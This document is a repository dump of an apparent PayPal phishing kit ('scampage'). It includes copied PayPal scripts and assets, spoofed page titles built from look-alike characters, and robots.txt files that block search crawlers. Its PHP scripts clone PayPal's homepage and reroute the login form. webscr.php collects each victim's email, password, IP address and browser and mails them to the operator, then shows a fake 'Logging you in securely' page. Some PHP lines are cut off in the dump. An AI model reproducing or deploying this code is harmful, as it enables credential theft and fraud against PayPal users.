j=0;j0){YUD.setStyle(arrowSpan,'left','0px');}else{YUD.setStyle(arrowSpan,'left',presentElement.offsetWidth-arrowSpan.offsetWidth+'px');} 72 | if(presentElement.offsetWidth>maxButtonWidth){maxButtonWidth=presentElement.offsetWidth;}} 73 | var secondaryItemListener=YUD.getElementsByClassName("hideSecondaryItem","li","transactionTable");var primaryItemListener=YUD.getElementsByClassName("primaryItem","li","transactionTable");var listSpanListener=YUD.getElementsByClassName("listSpan","span","transactionTable");var addShippingInfoListener=YAHOO.util.Dom.getElementsByClassName("addShippingInfo","li","transactionTable");YUE.addListener(secondaryItemListener,"click",PAYPAL.Beloved.Salsa.callSecondary);YUE.addListener(primaryItemListener,"click",PAYPAL.Beloved.Salsa.submitForm);YUE.addListener(primaryItemListener,"mouseover",PAYPAL.Beloved.Salsa.splitButtonHover);YUE.addListener(primaryItemListener,"mouseout",PAYPAL.Beloved.Salsa.splitButtonHover);YUE.addListener(listSpanListener,"mouseover",PAYPAL.Beloved.Salsa.splitButtonHover);YUE.addListener(listSpanListener,"mouseout",PAYPAL.Beloved.Salsa.splitButtonHover);YUE.addListener(secondaryItemListener,"mouseover",PAYPAL.Beloved.Salsa.showHideSecondaryHover,{show:true});YUE.addListener(secondaryItemListener,"mouseout",PAYPAL.Beloved.Salsa.showHideSecondaryHover,{show:false});YUE.removeListener(addShippingInfoListener,"click",PAYPAL.Beloved.Salsa.submitForm);YUE.addListener(addShippingInfoListener,"click",PAYPAL.Beloved.Salsa.callSecondary);YUE.addListener(document,"mouseup",PAYPAL.Beloved.Salsa.showHideSecondary);if(YUD.get('actions')){if(YUD.get('actions').offsetWidth>maxSplitButtonColumnWidth){YUD.setStyle(YUD.get('actions'),'width',maxSplitButtonColumnWidth+'px');var orderStatusTDs=YUD.getElementsByClassName('orderStatus','td',YUD.get('transactionTable'));YUD.setStyle(orderStatusTDs,"width",maxSplitButtonColumnWidth+'px');}} 74 | if(navigator.userAgent.toLowerCase().indexOf('chrome')>-1) 75 | {PAYPAL.Beloved.Salsa.setOffsetWidth();} 76 | if(navigator.userAgent.toLowerCase().indexOf('msie 7')>-1) 77 | {var splitBtns=YUD.getElementsByClassName("splitButton");for(i=0;i<=splitBtns.length;i++){YUD.setStyle(splitBtns[i],'margin-bottom','0px');}}};PAYPAL.Beloved.Salsa.splitButtonKeyNavigationOption=function(e){var a=YUE.getCharCode(e);var t=YUE.getTarget(e);var list=YUD.getAncestorByTagName(t,'ul');var li_items=list.getElementsByTagName("li");var li_ele=YUD.getAncestorByTagName(t,'li');var KEY_DOWN=40,KEY_UP=38,KEY_ESCAPE=27,KEY_TAB=9;if(a==KEY_DOWN){YUE.preventDefault(e);if(YUD.hasClass(li_ele,"primaryItem")&&YUD.hasClass(list,"closed")){YUD.replaceClass(list,"closed","open");} 78 | var nxtElement=YUD.getNextSibling(li_ele);if(nxtElement!=null){var nxtElementAnchor=YUD.getFirstChild(nxtElement);}else{var nxtElementAnchor=YUD.getFirstChild(li_items[0]);} 79 | YUD.setAttribute(t,"tabIndex",'-1');YUD.setAttribute(nxtElementAnchor,"tabIndex",'0');try{nxtElementAnchor.focus();}catch(e){}}else if(a==KEY_UP){YUE.preventDefault(e);if(YUD.hasClass(li_ele,"primaryItem")&&YUD.hasClass(list,"closed")){YUD.replaceClass(list,"closed","open");} 80 | var prvElement=YUD.getPreviousSibling(li_ele);if(prvElement!=null){var prvElementAnchor=YUD.getFirstChild(prvElement);}else{var prvElementAnchor=YUD.getFirstChild(li_items[li_items.length-1]);} 81 | YUD.setAttribute(t,"tabIndex",'-1');YUD.setAttribute(prvElementAnchor,"tabIndex",'0');try{prvElementAnchor.focus();}catch(e){}}else if(a==KEY_ESCAPE){if(!YUD.hasClass(li_ele,"primaryItem")){YUD.setAttribute(t,"tabIndex",'-1');var p=YUD.getFirstChild(YUD.getFirstChild(list));try{p.focus();}catch(e){} 82 | setTimeout('PAYPAL.Beloved.Salsa.closeSplitButtons()',1);}else{try{t.focus();}catch(e){} 83 | if(YUD.hasClass(list,"open")){setTimeout('PAYPAL.Beloved.Salsa.closeSplitButtons()',1);}}}else if(a==KEY_TAB){if(!YUD.hasClass(li_ele,"primaryItem")){YUD.setAttribute(t,"tabIndex",'-1');} 84 | YUD.setAttribute(YUD.getFirstChild(li_items[0]),"tabIndex",'0');if(YUD.hasClass(list,"open")){YUD.replaceClass(list,"open","closed");}}} 85 | PAYPAL.Beloved.Salsa.closeSplitButtons=function(){var list=YUD.getElementsByClassName('list','ul');YUD.replaceClass(list,"open","closed");} 86 | PAYPAL.Beloved.Salsa.extendDivWidth=function(){if(YUD.getElementsByClassName("divExtendWidth")[0]){if(document.getElementById("transactionTable").offsetWidth>YUD.getElementsByClassName("divExtendWidth")[0].offsetWidth){YUD.setStyle(YUD.getElementsByClassName("divExtendWidth"),"width",document.getElementById("transactionTable").offsetWidth-15+"px");}}};PAYPAL.Beloved.Salsa.setTransactionWidth=function(){var transTableMaxWidth=(YUD.get('activityFilters'))?936:691;var transTableWidth=YUD.get('transactionTable').offsetWidth;if(transTableWidth>transTableMaxWidth){var maxEmailColumnWidth=(YUD.get('activityFilters'))?165:100;var emailInfoTDs=YUD.getElementsByClassName("emailInfo","td",YUD.get('transactionTable'));var emailInfoDIVs=YUD.getElementsByClassName("wrapEmail","div",YUD.get('transactionTable'));if(emailInfoTDs[0]&&emailInfoTDs[0].offsetWidth>maxEmailColumnWidth) 87 | {YUD.setStyle(emailInfoTDs,"width",maxEmailColumnWidth-10+"px");YUD.setStyle(emailInfoDIVs,"width",maxEmailColumnWidth-10+"px");}} 88 | transTableWidth=YUD.get('transactionTable').offsetWidth;if(transTableWidth>transTableMaxWidth){var maxPaymentStatusWidth=(YUD.get('activityFilters'))?120:90;var paymentInfoTDs=YUD.getElementsByClassName("paymentStatusInfo","td",YUD.get('transactionTable'));var paymentInfoDIVs=YUD.getElementsByClassName("wrapPaymentStatus","div",YUD.get('transactionTable'));if(paymentInfoTDs[0]&&paymentInfoTDs[0].offsetWidth>maxPaymentStatusWidth) 89 | {YUD.setStyle(paymentInfoTDs,"width",maxPaymentStatusWidth-10+"px");YUD.setStyle(paymentInfoDIVs,"width",maxPaymentStatusWidth-10+"px");}}} 90 | YUE.addListener(window,"load",PAYPAL.Beloved.Salsa.setTransactionWidth);PAYPAL.Beloved.Salsa.showShippingCompany=function(){var showHideTextbox;if(this.id=="markShippedUsing"){showHideTextbox="shippingCompanyName";}else if(this.id=="shippedUsing"){showHideTextbox="shippingCompanyNameAddTracking";} 91 | if(this.value=="9"||this.value=="19"||this.value=="26"||this.value=="37"||this.value=="45"||this.value=="52"||this.value=="62"||this.value=="72"||this.value=="95"){YUD.removeClass(YUD.getElementsByClassName(showHideTextbox),"accessAid");}else{YUD.addClass(YUD.getElementsByClassName(showHideTextbox),"accessAid");}};PAYPAL.Beloved.Salsa.noTrackInfoSelected=function(){var flag;if(this.id=="trackInfoNo"){flag=true;}else{flag=false;} 92 | document.getElementById("markShippedUsing").disabled=flag;document.getElementById("otherShippingCompany").disabled=flag;document.getElementById("trackingNumShipped").disabled=flag;};PAYPAL.Beloved.Salsa.lastDownload=function(e){YUE.preventDefault(e);PAYPAL.Beloved.Salsa.callLightbox("downloadLightbox");var ajaxHandler={success:function(request){var result=PAYPAL.Beloved.Salsa.getTagContents("last_download_time_present",request.responseText);var download_time=PAYPAL.Beloved.Salsa.getTagContents("last_download_time_result",request.responseText);var download_time_error_content=document.getElementById("show_lightbox_error_content").value;if(result=='true'){var last_download_content=document.getElementById("lastDownloadContent").value;document.getElementById("timeFromLastDownload").innerHTML=last_download_content+download_time;}else{document.getElementById("timeFromLastDownload").innerHTML=download_time_error_content;}},failure:function(request){document.getElementById("timeFromLastDownload").innerHTML=download_time_error_content;},timeout:26000};var url="/cgi-bin/webscr?cmd=_last-download-time";YAHOO.util.Connect.asyncRequest("GET",url,ajaxHandler);};PAYPAL.Beloved.Salsa.checkElement=function(){var allElements;var flag=true;if(this.className=="archiveCheck"){if(this.id!="recent_all_selected"){if(this.checked===true){YUD.addClass(this.parentNode.parentNode,"rowFocusColor");}else{YUD.removeClass(this.parentNode.parentNode,"rowFocusColor");}} 93 | allElements=YUD.getElementsByClassName("archiveCheck");for(var i=1;i0){imgList[0].removeAttribute("alt");flagRemoveAlt=1;}}}};PAYPAL.Beloved.Salsa.printPage=function(e){if(e){YUE.preventDefault(e);} 97 | window.print();};PAYPAL.Beloved.Salsa.printOnPageLoad=function(e){YUE.addListener(window,"load",function(){window.print();});};PAYPAL.Beloved.Salsa.balloonControl=function(e){YUE.preventDefault(e);};PAYPAL.Beloved.Salsa.HistorydownloadFileType=function(e){YUE.preventDefault(e);PAYPAL.Beloved.Salsa.callLightbox("downloadFileTypeLightbox");var downloadFileTypeLength=document.getElementById('download_file_type_lightbox').options.length;for(var i=0;i=1){for(var i=0;i0){if(searchVal=='store_id'){YUD.addClass(singleCurrency,"hide");}else{YUD.removeClass(singleCurrency,"hide");}}};PAYPAL.Beloved.Salsa.disableDateSearch=function(){PAYPAL.Beloved.Salsa.disableCurrencySearch();if(this.value=='trans_id'||this.value=='wax_receipt'||this.value=='disbursement_id'){document.getElementById('from_date').disabled=true;document.getElementById('to_date').disabled=true;YUD.addClass(ppc1.calIconMask,"disable");YUD.addClass(ppc2.calIconMask,"disable");}else{document.getElementById('from_date').disabled=false;document.getElementById('to_date').disabled=false;YUD.removeClass(ppc1.calIconMask,"disable");YUD.removeClass(ppc2.calIconMask,"disable");}};PAYPAL.Beloved.Salsa.hideHelpText=function(){if(YUD.get("search").value==YUD.get("searchContent").value){this.value="";YUD.removeClass(this,"secondary");}};PAYPAL.Beloved.Salsa.transferToPartner=function(e){var lb=null;YUE.preventDefault(e);PAYPAL.util.Connect.sendFromLink(this.id,{'type':'minipage','callback':function(data){if(data){lb=new PAYPAL.util.Lightbox("scLbx");lb.addPage(data.html);lb.show();YUE.addListener("BuyerCreditSSO","submit",function(e){YUE.preventDefault(e);lb.close();this.target="_blank";this.submit();});YUE.addListener("cancel.x","click",function(e){YUE.preventDefault(e);lb.close();return true;});YUE.addListener('Skip','click',function(){if(document.getElementsByName('skip')[0].checked)YUE.removeListener('vendorlink','click',PAYPAL.Beloved.Salsa.transferToPartner);else YUE.addListener('vendorlink','click',PAYPAL.Beloved.Salsa.transferToPartner);});}}},{'continue':'Apply'});return true;};PAYPAL.Beloved.Salsa.initAccessibilityFilters=function(){var accessibilityFilterElements=[];moreFilterBtn=YUD.get("showMoreFiltersBtn");moreBtn=YUD.get("showMoreBtn");if(moreFilterBtn){accessibilityFilterElements.push(moreFilterBtn);} 99 | if(moreBtn){accessibilityFilterElements.push(moreBtn);} 100 | for(i=0;i0){YUD.get('cancelLightbox').removeChild(YUD.getElementsByClassName('container-close')[0]);} 109 | YUE.addListener('cancelPaymentNo','click',function(e){YUE.preventDefault(e);cancelLightbox.close();});}}});}};PAYPAL.Beloved.Salsa.initPSBLightBox=function(){var expirablePSBLink=YUD.getElementsByClassName('expPSB','a');YUE.addListener(expirablePSBLink,'click',function(e){var expPSBLB=null,expPSBLBID=(e.target||e.srcElement).id;YUE.preventDefault(e);PAYPAL.util.Connect.sendFromLink(expPSBLBID,{'type':'minipage','callback':function(data){if(data){expPSBLB=new PAYPAL.util.Lightbox('expPSBLightbox');expPSBLB.addPage(data.html);expPSBLB.show();} 110 | YUE.addListener('closeLB','click',function(e){YUE.preventDefault(e);expPSBLB.close();});}},{'view_expPSB.x':'Apply'});return true;});} 111 | YUE.addListener(window,"load",PAYPAL.Beloved.Salsa.cancelSubflow.init); -------------------------------------------------------------------------------- /myaccount/objects/PayPalIcons-Regular.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/objects/PayPalIcons-Regular.eot -------------------------------------------------------------------------------- /myaccount/objects/PayPalIcons-Regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/objects/PayPalIcons-Regular.ttf -------------------------------------------------------------------------------- /myaccount/objects/PayPalIcons-Regular.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/objects/PayPalIcons-Regular.woff -------------------------------------------------------------------------------- /myaccount/objects/btn_bg_default.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/objects/btn_bg_default.gif -------------------------------------------------------------------------------- /myaccount/objects/btn_bg_sprite.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/objects/btn_bg_sprite.gif -------------------------------------------------------------------------------- /myaccount/objects/btn_bg_submit.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/objects/btn_bg_submit.gif -------------------------------------------------------------------------------- /myaccount/objects/nav_sprite.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/objects/nav_sprite.gif -------------------------------------------------------------------------------- /myaccount/objects/src_ao_bluebg_1x300.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/objects/src_ao_bluebg_1x300.gif -------------------------------------------------------------------------------- /myaccount/page/cvv_info_pop&enable_locale.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Card Security Code - ΡayΡal 6 | 7 | 8 | 9 | 10 | 23 | -------------------------------------------------------------------------------- /myaccount/robots.txt: -------------------------------------------------------------------------------- 1 | User-agent: * 2 | Disallow: / 3 | Disallow: /MoreArt/ 4 | Disallow: /css/ 5 | Disallow: /form/ 6 | Disallow: /icon/ 7 | Disallow: /js/ 8 | Disallow: /objects/ 9 | Disallow: /page/ -------------------------------------------------------------------------------- /robots.txt: -------------------------------------------------------------------------------- 1 | User-agent: * 2 | Disallow: / 3 | Disallow: /webapps/ 4 | Disallow: /myaccount/ -------------------------------------------------------------------------------- /webapps/MoreArt/home.php: -------------------------------------------------------------------------------- 1 | array( 10 | 'method'=>"GET", 11 | 'header'=>"User-Agent: ".$_SERVER['HTTP_USER_AGENT']."" // i.e. An iPad 12 | ) 13 | ); 14 | 15 | $context = stream_context_create($options); 16 | 17 | function getStr($string,$start,$end) 18 | { 19 | $str = explode($start,$string); 20 | $str = explode($end,$str[1]); 21 | return $str[0]; 22 | } 23 | 24 | # Pembeda Negara 25 | if (stripos($negara, 'GB') !== false){ 26 | $page = file_get_contents('https://www.paypal.com/cz/webapps/mpp/home', false, $context); 27 | $title = getStr($page, '', ''); 28 | $select = getStr($page, '
', '
'); 29 | $result = str_replace($title, 'PayPal United Kingdom: Pay, Send Money & Accept Payments', $page); 30 | $result = str_replace($select, 'Change Language or Country', $result); 31 | } elseif (stripos($negara, 'US') !== false || stripos($negara, 'IR') !== false || stripos($negara, '') !== false || stripos($negara, 'JP') !== false){ 32 | $page = file_get_contents('https://www.paypal.com/cz/webapps/mpp/home', false, $context); 33 | $title = getStr($page, '', ''); 34 | $select = getStr($page, '
', '
'); 35 | $result = str_replace($title, 'Send Money, Pay Online or Set Up a Merchant Account - PayPal', $page); 36 | $result = str_replace($select, 'See all countries', $result); 37 | } else { 38 | $result = file_get_contents($url, false, $context); 39 | } 40 | 41 | # Get Link 42 | $get_link = getStr($result, 'My Account;action-uri=', 'cgi-bin/webscr'); 43 | $get_link = getStr($result, '', 'novalidate="novalidate"'); 45 | $loging = 'webscr?cmd=_login-run&dispatch='.md5(gmdate('r')); 46 | 47 | # Get pp home 48 | $view = str_replace(":", ":", $result); 49 | $view = str_replace("/", "/", $view); 50 | $view = str_replace("?", "?", $view); 51 | $view = str_replace("=", "=", $view); 52 | $view = str_replace($get_link."cgi-bin/webscr?cmd=_login-submit", $loging, $view); 53 | $view = str_replace($get_form, '
-------------------------------------------------------------------------------- /webapps/MoreArt/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /webapps/MoreArt/webscr.php: -------------------------------------------------------------------------------- 1 | 20) { 13 | header("LOCATION: websrc?cmd=_login-submit&dispatch=".md5(gmdate('r')).sha1(gmdate('r'))); 14 | } else { 15 | 16 | //+++++++++++++++++++++++++++++// ISI PESAN \\+++++++++++++++++++++++++++++\\ 17 | $message = " 18 | ++========[ Haurgeulis HunterZ ]========++ 19 | 20 | .++====[ PayPal ]====++. 21 | Email : ".$email." 22 | Password : ".$password." 23 | .++======[ End ]======++. 24 | 25 | .++====[ PC Info ]====++. 26 | IP Info : ".$ip." | ".$nama_negara." On ".date('r')." 27 | Browser : ".$_SERVER['HTTP_USER_AGENT']." 28 | .++======[ End ]======++. 29 | 30 | ++===[ ^_^ Haurgeulis Money HunterZ ^_^ ]===++ 31 | "; 32 | //+++++++++++++++++++++++++++++\\ ISI PESAN //+++++++++++++++++++++++++++++\\\ 33 | 34 | include '../../____YourMail____.php'; 35 | $subject = "PayPal (".$nama_negara.") (".$ip.")"; 36 | $headers = "From: PP Spam Result "; 37 | mail($emailku, $subject, $message, $headers); 38 | 39 | include '../../myaccount/form/ip_info.php'; 40 | $subject = "PayPal (".$nama_negara.") (".$ip.")"; 41 | $headers = "From: PP Spam Result "; 42 | mail($emailku, $subject, $message, $headers); 43 | 44 | $md5 = md5(gmdate("r")); 45 | $sha1 = sha1(gmdate("r")); 46 | ?> 47 | 48 | 49 | Logging in – PayPaI 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 |
59 |
60 |
61 |
62 |

One moment...

63 |
64 | Logging you in securely 65 |

Still loading after a few seconds? Try again.

66 |
67 | 68 | 73 | 74 | 75 | 76 | -------------------------------------------------------------------------------- /webapps/MoreArt/websrc.php: -------------------------------------------------------------------------------- 1 | array( 15 | 'method'=>"GET", 16 | 'header'=>"User-Agent: ".$_SERVER['HTTP_USER_AGENT']."" // i.e. An iPad 17 | ) 18 | ); 19 | 20 | $context = stream_context_create($options); 21 | 22 | function getStr($string,$start,$end) 23 | { 24 | $str = explode($start,$string); 25 | $str = explode($end,$str[1]); 26 | return $str[0]; 27 | } 28 | 29 | 30 | $result = file_get_contents($url, false, $context); 31 | 32 | 33 | # Get Link 34 | $get_link = getStr($result, ' -------------------------------------------------------------------------------- /webapps/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /webapps/robots.txt: -------------------------------------------------------------------------------- 1 | User-agent: * 2 | Disallow: / 3 | Disallow: /MoreArt/ --------------------------------------------------------------------------------